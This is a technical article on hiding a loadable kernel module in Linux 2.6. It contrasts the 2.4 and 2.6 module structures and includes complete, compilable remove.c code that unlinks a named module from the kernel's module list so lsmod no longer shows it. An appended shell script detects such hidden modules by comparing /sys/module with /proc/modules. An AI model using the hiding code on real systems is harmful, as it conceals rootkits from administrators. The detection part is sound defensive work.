
How to Hide a Linux 2.6 Kernel Module

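  Compared with the 2.4 kernel, the 2.6 kernel changed in many ways: the module code was completely rewritten and its data structures changed as well. In the 2.4 kernel, a module was hidden like this (see madsys, Phrack 61-03):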
struct module *p;
for (p=&__this_module; p->next; p=p->next)
  {
    if (strcmp(p->next->name, str))
      continue;       
    p->next=p->next->next; // <-- here it removes that module
    break;
  }
The 2.4 definition of struct module is:
struct module
{
  unsigned long size_of_struct; /* == sizeof(module) */
  struct module *next;
  const char *name;
  unsigned long size;
  ...
}
In 2.6 it is:
struct module
{
  enum module_state state;
  /* Member of list of modules */
  struct list_head list; /* <--- now a doubly linked list */
  /* Unique handle for this module */
  char name[MODULE_NAME_LEN];
  ...
}
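The standard kernel list helper functions can therefore be used (no need to reinvent the wheel), and the 2.6 version of the hiding code is rewritten as: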
/*
* FileName: remove.c
* Author: CoolQ
* Date: 23:05 2004-9-2
* Makefile:
* ---------------- cut here -----------------
* obj-m += remove.o
* KDIR:= /lib/modules/$(shell uname -r)/build
* PWD:= $(shell pwd)
* default:
* $(MAKE) -C $(KDIR) SUBDIRS=$(PWD) modules
*----------------- cut here -----------------
* Compile:
* [root@coolq tmp]make
* Usage:
* [root@coolq tmp]insmod remove.ko mod_name=module_name_to_hide
*/
#include <linux/init.h>
#include <linux/module.h>
#include <linux/moduleparam.h>
#include <linux/kernel.h>
#include <linux/list.h>
#include <linux/string.h>
static char *mod_name = "module";
module_param(mod_name, charp, 0);
static int remove_init(void)
{
  struct module *mod_head, *mod_counter;
  struct list_head *p;
  mod_head = &__this_module;
  list_for_each(p, &mod_head->list){
    mod_counter = list_entry(p, struct module, list);
    if(strcmp(mod_counter->name, mod_name) == 0){
      list_del(p);
      printk("remove module %s successfully.\n", mod_name);
      return 0;
    }
  }
  printk("Can't find module %s.\n", mod_name);
  return 0;
}
static void remove_exit(void)
{
}
module_init(remove_init);
module_exit(remove_exit);
MODULE_LICENSE("Dual BSD/GPL");
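
The list_del() call above only unlinks the module from the list that /proc/modules (and therefore lsmod) is printed from; it does not touch the module's sysfs directory. The following cross-view check is an added example, not part of the original article: it reports modules that are present under /sys/module but absent from /proc/modules. The function names, the fixture data, and the use of the `initstate`/`refcnt` sysfs files to tell loadable modules from built-in entries are assumptions of this example.

```shell
#!/bin/sh
# Added example. Cross-view check: report loadable modules that still have a
# sysfs directory but are missing from the list /proc/modules is printed from.
# Usage: hidden_modules [proc_modules_file] [sys_module_dir]
hidden_modules() {
    proc_file=${1:-/proc/modules}
    sys_dir=${2:-/sys/module}
    [ -r "$proc_file" ] || { echo "cannot read $proc_file" >&2; return 2; }
    for d in "$sys_dir"/*/; do
        [ -d "$d" ] || continue
        # Assumption: loadable modules expose "initstate" or "refcnt" in sysfs;
        # built-in entries (e.g. parameters only) have neither and are skipped.
        [ -e "${d}initstate" ] || [ -e "${d}refcnt" ] || continue
        name=$(basename "$d")
        # The first field of each /proc/modules line is the module name.
        awk -v n="$name" '$1 == n { found = 1 } END { exit !found }' "$proc_file" \
            || printf '%s\n' "$name"
    done
}

# Constructed sample data (not captured from a real host): two listed modules,
# one built-in entry, and "hidden_mod", which exists only in the sysfs view.
make_fixture() {
    mkdir -p "$1/sys/ext3" "$1/sys/jbd" "$1/sys/hidden_mod" "$1/sys/printk/parameters"
    : > "$1/sys/ext3/refcnt"
    : > "$1/sys/jbd/refcnt"
    : > "$1/sys/hidden_mod/refcnt"
    printf '%s\n' \
        'ext3 116624 2 - Live 0xf8a1c000' \
        'jbd 49560 1 ext3, Live 0xf89f0000' > "$1/proc_modules"
}

# Demo on the fixture; on a live system call hidden_modules with no arguments.
tmp=$(mktemp -d) && make_fixture "$tmp" && hidden_modules "$tmp/proc_modules" "$tmp/sys"
rm -rf "$tmp"
```

A name printed by this check is a lead for further investigation rather than proof, since a module that is being loaded or unloaded at that moment can briefly appear in only one of the two views.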